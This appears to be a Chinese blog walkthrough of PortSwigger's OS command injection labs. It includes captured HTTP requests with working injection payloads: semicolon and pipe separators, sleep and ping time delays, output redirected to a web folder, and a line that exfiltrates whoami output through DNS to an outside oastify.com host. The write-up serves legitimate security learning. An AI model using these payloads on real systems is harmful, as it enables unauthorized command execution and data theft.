Burp Web Academy 命令注入

发表于 更新于 分类于

0x01. PortSwigger Web Security Academy

PortSwigger Web Security Academy 是 Burp Suite 官方推出的免费 Web 安全学习靶场,在学习 Web 安全知识的同时,还可以练习 Burp Suite 的实战技能。

本篇文章讲解 Web Security Academy 之中的系统命令注入(OS Command Injection)章节。

0x02. 命令注入

2.1 Lab: OS command injection, simple case

This lab contains an OS command injection vulnerability in the product stock checker.

The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.

To solve the lab, execute the whoami command to determine the name of the current user.

访问 URL https://0a46004a04ca1df9817fdf8200f300f2.web-security-academy.net/product?productId=14,最下面有一个 Check stock 按钮,点击后在 Burp Suite 中可以看到 POST 请求:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /product/stock HTTP/2
Host: 0a46004a04ca1df9817fdf8200f300f2.web-security-academy.net
Cookie: session=vXIadQwAPKmbmZxQ4EIJ9iSZhSVLaQGW
Content-Length: 22
Sec-Ch-Ua: "Chromium";v="127", "Not)A;Brand";v="99"
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a46004a04ca1df9817fdf8200f300f2.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a46004a04ca1df9817fdf8200f300f2.web-security-academy.net/product?productId=14
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

productId=14&storeId=1

尝试通过反引号注入,发现不行;再尝试分号 productId=1&storeId=2;whoami,成功执行注入的命令。

1
2
3
4
5
6
7
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 16

22
peter-8oOYgZ

2.2 Lab: Blind OS command injection with time delays

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.

To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay.

问问 Copilot 什么是盲注(中文回答还差点意思):

Question: What’s the meaning of blind injection in Web Security?

Answer: In Web Security, “blind injection,” or more specifically, “blind SQL injection,” is a type of SQL injection attack where an attacker sends queries to the database and infers the results based on the behavior of the web application, rather than seeing the data directly.

For example, an attacker might send a query designed to return a true or false result and then observe how the web page responds. If the page’s response changes, the attacker knows that the query affected the database, even though they can’t see the data directly.

This method can be more time-consuming than other types of SQL injection because it requires careful observation and crafting of queries, but it’s still a powerful technique for extracting sensitive information from databases.

If you’re interested in learning more about how to defend against such attacks, I can provide some tips or resources. Just let me know!

根据题目的提示,发现右上角有一个 Submit feedback,尝试进行注入测试:

  • 注入点在 email 字段
  • 通过 sleep 10 来实现延时
    • 注入命令前后都需要有注入字符,比如 ;sleep%2010; 或者 ||sleep%2010||
    • 官方答案使用 ping 来延时(;ping+-c+10+127.0.0.1;
      • 注意,在 URL 编码中,空格 不仅可以使用 %20 编码,还可以使用 + 编码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /feedback/submit HTTP/2
Host: 0ada000a04235099835f5fb6007600c8.web-security-academy.net
Cookie: session=KCki6D8u9Sy6u5Vvpn2xzlzoInIThtKF
Content-Length: 98
Sec-Ch-Ua: "Chromium";v="127", "Not)A;Brand";v="99"
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0ada000a04235099835f5fb6007600c8.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ada000a04235099835f5fb6007600c8.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

csrf=aubYsYL43kPMCm2FyEuBeWNbAKGudIEW&name=1&email=2%40gmail.com||sleep%2010||&subject=2&message=3

2.3 Lab: Blind OS command injection with output redirection

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:

1
/var/www/images/

The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.

To solve the lab, execute the whoami command and retrieve the output.

在前一题的基础上,这个题就很简单了:将命令执行的结果写入 /var/www/images/,然后通过 URL 来查看文件内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /feedback/submit HTTP/2
Host: 0a4400c9044f1daf8136fddf00da0017.web-security-academy.net
Cookie: session=9mWga6JAGpv2oYMEFc88AQQucaKnWabL
Content-Length: 117
Sec-Ch-Ua: "Chromium";v="127", "Not)A;Brand";v="99"
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a4400c9044f1daf8136fddf00da0017.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4400c9044f1daf8136fddf00da0017.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

csrf=woqXf8DV6FUWJtWTZA3KZJfMtcX5wjBU&name=1&email=2%40gmail.com;whoami>/var/www/images/flag.txt;&subject=3&message=4

然后通过图片 URL 访问即可:

1
https://0a4400c9044f1daf8136fddf00da0017.web-security-academy.net/image?filename=flag.txt

2.4 Lab: Blind OS command injection with out-of-band interaction

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

仍然是盲注,但是这次是异步执行命令,所以通过延时就无法感知命令注入是否成功了,这里通过发起 DNS 查询来感知命令注入的结果。

看 Burp Collaborator 的介绍,似乎 Burp Suite Community 没有这个功能,有点遗憾,那么就临时用一下 Burp Suite Pro 吧 :-D

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /feedback/submit HTTP/2
Host: 0a340036035ad56781a5170c00c3001e.web-security-academy.net
Cookie: session=rpcnlZoYzqHXOMNFaBDPAXRhzfQyjMU4
Content-Length: 140
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0a340036035ad56781a5170c00c3001e.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a340036035ad56781a5170c00c3001e.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

csrf=n8QHyGJzWxs0jAJKlHTQC3wr23wNlze9&name=1&email=2%40gmail.com;ping+-c+4+vwvk7vf1wdbva4fzqi26fvxkvb12psdh.oastify.com;&subject=3&message=4

操作步骤:

  1. 进入 Burp Suite Pro,点击 Collaborator,生成一个域名
  2. 在 HTTP POST 请求中,通过注入 ping 域名
  3. 回到 Burp 中的 Collaborator,可以看到已经触发了 DNS 解析,如果暂时没看到,可以点击 Poll now 按钮刷新

Burp Collaborator DNS 解析日志

2.5 Blind OS command injection with out-of-band data exfiltration

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab.

在上一题的基础上增加了一点难度,不仅仅要触发 DNS 查询,还要携带 whoami 的输出。网上找了下,可以通过子域名的形式携带数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /feedback/submit HTTP/2
Host: 0aeb00c604ebf6b7814361ed00aa00ed.web-security-academy.net
Cookie: session=PsXwTpAQTtcmERBtVDSEoCJ64RGkstlc
Content-Length: 150
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0aeb00c604ebf6b7814361ed00aa00ed.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00c604ebf6b7814361ed00aa00ed.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

csrf=7Ry8gMMe46FqvD9HJHRqCpswXSz69Bti&name=1&email=2%40gmail.com;ping+-c+4+$(whoami).vwvk7vf1wdbva4fzqi26fvxkvb12psdh.oastify.com;&subject=3&message=4

0x03. 小结

  • 注入可以使用反引号、分号、管道、&&|| 等,注入时有可能命令末尾还需要加上注入字符,比如 ;payload;
  • 盲注可以使用 sleepping 等延时
  • 在 URL 编码中,空格 不仅可以使用 %20 编码,还可以使用 + 编码
  • Burp Collaborator 在盲注中的使用
    • DNS 解析,判断盲注状态
    • DNS 解析,通过子域名携带数据
  • DNS 解析可以使用 pingnslookup 等命令

0x04. 参考文档

  1. https://portswigger.net/web-security/all-labs#os-command-injection
  2. https://portswigger.net/burp/documentation/collaborator